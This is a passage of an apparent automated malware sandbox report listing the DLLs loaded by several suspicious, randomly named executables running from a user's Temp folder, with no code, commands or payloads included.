Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: iphlpapi.dll
